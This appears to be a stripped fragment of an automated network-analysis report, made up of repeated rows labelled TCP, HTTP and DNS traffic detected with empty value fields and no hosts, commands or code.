Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: |
Source: | HTTP traffic detected: |
Source: | HTTP traffic detected: |